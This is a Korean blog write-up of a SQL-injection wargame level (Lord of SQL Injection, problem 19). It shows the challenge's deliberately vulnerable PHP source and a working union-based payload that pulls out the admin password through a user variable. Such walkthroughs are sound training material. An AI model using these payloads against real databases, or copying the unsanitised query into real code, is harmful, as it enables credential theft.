Oh! JUN

[Lord Of SQL Injection] 19번(추가해결방법) 본문

문제풀이/Lord of SQL Injection

[Lord Of SQL Injection] 19번(추가해결방법)

Kwon Oh! JUN 2022. 2. 9. 00:30

query : select id from prob_xavis where id='admin' and pw=''


<?php 
  include "./config.php"
  login_chk(); 
  $db dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/regex|like/i'$_GET[pw])) exit("HeHe"); 
  $query "select id from prob_xavis where id='admin' and pw='{$_GET[pw]}'"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query "select pw from prob_xavis where id='admin' and pw='{$_GET[pw]}'"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("xavis"); 
  highlight_file(__FILE__); 
?>

select id from prob_xavis where id='admin' and pw='' or (select @a:=pw where id = 'admin') union select @a%23'

select @a:=pw where id = 'admin'

prob_xavis 테이블에서 id가 'admin'인 pw을 찾아서 변수@a에 대입한다.

*변수안에 값을 넣는거 자체가 false라고 한다.

 

union select @a

union 앞에 있는 쿼리와 결과를 합쳐서 id가 'admin'인 pw을 보여준다. 

* select @a:=pw where id = 'admin'가 false이기 때문에 이 쿼리와 union select @a 쿼리를 합쳐서 출력해도 id가 'admin'인 pw만 보여주게 된다.

 

query : select id from prob_xavis where id='admin' and pw='' or (select @a:=pw where id = 'admin') union select @a#'

 

Hello 우왕굳

<?php 
  include "./config.php"
  login_chk(); 
  $db dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/regex|like/i'$_GET[pw])) exit("HeHe"); 
  $query "select id from prob_xavis where id='admin' and pw='{$_GET[pw]}'"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query "select pw from prob_xavis where id='admin' and pw='{$_GET[pw]}'"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("xavis"); 
  highlight_file(__FILE__); 
?>

 

 

'문제풀이 > Lord of SQL Injection' 카테고리의 다른 글

[Lord Of SQL Injection] 21번(error blind sql)  (0) 2022.02.12
[Lord Of SQL Injection] 20번(%0a : 줄 바꾸기)  (0) 2022.02.09
[Lord Of SQL Injection] 19번(어렵다★★★)  (0) 2022.02.08
[Lord Of SQL Injection] 18번(('1')==0?) ;00%  (0) 2022.02.06
[Lord Of SQL Injection] 17번(더블쿼터, Nullbyte)  (0) 2022.02.05
'문제풀이/Lord of SQL Injection' Related Articles more